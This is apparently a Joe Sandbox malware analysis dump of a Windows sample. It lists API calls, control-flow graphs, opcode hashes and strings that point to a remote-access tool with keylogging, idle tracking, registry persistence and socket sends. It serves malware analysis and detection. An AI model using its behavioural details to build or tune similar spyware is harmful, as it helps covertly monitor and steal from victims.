                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                  • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                  • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                  • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                  Control-flow Graph

                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040A456
                                                  • Sleep.KERNELBASE(000001F4), ref: 0040A461
                                                  • GetForegroundWindow.USER32 ref: 0040A467
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                  • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 547a7cfd8ecb315c382de053530a614a00025319d5b4f46ac54375dc0518001e
                                                  • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                  • Opcode Fuzzy Hash: 547a7cfd8ecb315c382de053530a614a00025319d5b4f46ac54375dc0518001e
                                                  • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1194 40c89e-40c8c3 call 401e52 1197 40c8c9 1194->1197 1198 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1194->1198 1200 40c8d0-40c8d5 1197->1200 1201 40c9c2-40c9c7 1197->1201 1202 40c905-40c90a 1197->1202 1203 40c9d8 1197->1203 1204 40c9c9-40c9ce call 43ac0f 1197->1204 1205 40c8da-40c8e8 call 41a74b call 401e18 1197->1205 1206 40c8fb-40c900 1197->1206 1207 40c9bb-40c9c0 1197->1207 1208 40c90f-40c916 call 41b15b 1197->1208 1221 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1198->1221 1209 40c9dd-40c9e2 call 43ac0f 1200->1209 1201->1209 1202->1209 1203->1209 1218 40c9d3-40c9d6 1204->1218 1225 40c8ed 1205->1225 1206->1209 1207->1209 1222 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1208->1222 1223 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1208->1223 1224 40c9e3-40c9e8 call 4082d7 1209->1224 1218->1203 1218->1224 1230 40c8f1-40c8f6 call 401e13 1222->1230 1223->1225 1224->1198 1225->1230 1230->1198
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: f411b4bda197469a8f5fa6f0702ce682b0f23decd79daaf3752e96957329e7a7
                                                  • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                  • Opcode Fuzzy Hash: f411b4bda197469a8f5fa6f0702ce682b0f23decd79daaf3752e96957329e7a7
                                                  • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-2070987746
                                                  • Opcode ID: 2b18f229538df81ea9d982a80dc21e3ef646ce9f87e0def4b65cb5a9171dabf9
                                                  • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                  • Opcode Fuzzy Hash: 2b18f229538df81ea9d982a80dc21e3ef646ce9f87e0def4b65cb5a9171dabf9
                                                  • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1365 409d97-409da7 1366 409e44-409e47 1365->1366 1367 409dad-409daf 1365->1367 1368 409db2-409dd8 call 401e07 CreateFileW 1367->1368 1371 409e18 1368->1371 1372 409dda-409de8 GetFileSize 1368->1372 1373 409e1b-409e1f 1371->1373 1374 409dea 1372->1374 1375 409e0f-409e16 CloseHandle 1372->1375 1373->1368 1376 409e21-409e24 1373->1376 1377 409df4-409dfb 1374->1377 1378 409dec-409df2 1374->1378 1375->1373 1376->1366 1381 409e26-409e2d 1376->1381 1379 409e04-409e09 Sleep 1377->1379 1380 409dfd-409dff call 40a7f0 1377->1380 1378->1375 1378->1377 1379->1375 1380->1379 1381->1366 1383 409e2f-409e3f call 4082dc call 4098a5 1381->1383 1383->1366
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                  • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,00409E6F), ref: 00409E10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: `AG
                                                  • API String ID: 1958988193-3058481221
                                                  • Opcode ID: b0d5ab9d96485228d01e653f577d9a536d0e325b1c446dee4fcf46d6e6ae2c45
                                                  • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                  • Opcode Fuzzy Hash: b0d5ab9d96485228d01e653f577d9a536d0e325b1c446dee4fcf46d6e6ae2c45
                                                  • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1387 4126d2-4126e9 RegCreateKeyA 1388 412722 1387->1388 1389 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1387->1389 1391 412724-412730 call 401eea 1388->1391 1389->1391
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                  • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                  • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: HgF$pth_unenc
                                                  • API String ID: 1818849710-3662775637
                                                  • Opcode ID: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                  • Opcode Fuzzy Hash: 1bd7bc63bfcb718f8a00b857ba0206b1347799401e36ec3cc1597cb67c32c774
                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 12a7e14b742792f2f7edc51aeeb20cb2f460560c35512bbf3bc1a56244271605
                                                  • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                  • Opcode Fuzzy Hash: 12a7e14b742792f2f7edc51aeeb20cb2f460560c35512bbf3bc1a56244271605
                                                  • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: TUF
                                                  • API String ID: 1818849710-3431404234
                                                  • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                  • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                  • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                  • CloseHandle.KERNELBASE(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                  • String ID:
                                                  • API String ID: 3604237281-0
                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                  • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                  • GetLastError.KERNEL32 ref: 0040BEF1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: Rmc-MKYDDH
                                                  • API String ID: 1925916568-2989027721
                                                  • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                  • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                  APIs
                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                  • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventObjectSingleWaitsend
                                                  • String ID:
                                                  • API String ID: 3963590051-0
                                                  • Opcode ID: 314c35cb7c3e0cdd1eb64e7b3ffc619a90be7dd70040102f0ebb66c8c0e95541
                                                  • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                  • Opcode Fuzzy Hash: 314c35cb7c3e0cdd1eb64e7b3ffc619a90be7dd70040102f0ebb66c8c0e95541
                                                  • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                                  • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                  • Opcode Fuzzy Hash: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                                  • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                  • RegCloseKey.KERNELBASE(00000000), ref: 0041269D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                  • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                  • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                  • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                  • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044E1C2
                                                  • _free.LIBCMT ref: 0044E1FB
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E202
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnvironmentStrings$Free_free
                                                  • String ID:
                                                  • API String ID: 2716640707-0
                                                  • Opcode ID: 032fcb4f66621f9a486cbfb9aa35bb7b186a8ceb34f2922937091fe798fd91d5
                                                  • Instruction ID: bde093253d31ff8e435db0bb20b1dc60884eb56c9c20eb6ac573b4202a4b54cd
                                                  • Opcode Fuzzy Hash: 032fcb4f66621f9a486cbfb9aa35bb7b186a8ceb34f2922937091fe798fd91d5
                                                  • Instruction Fuzzy Hash: B8E0653714492126F211362B7C89D6F2A1DEFC2775B26013AF50596243EE688D0641EA
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
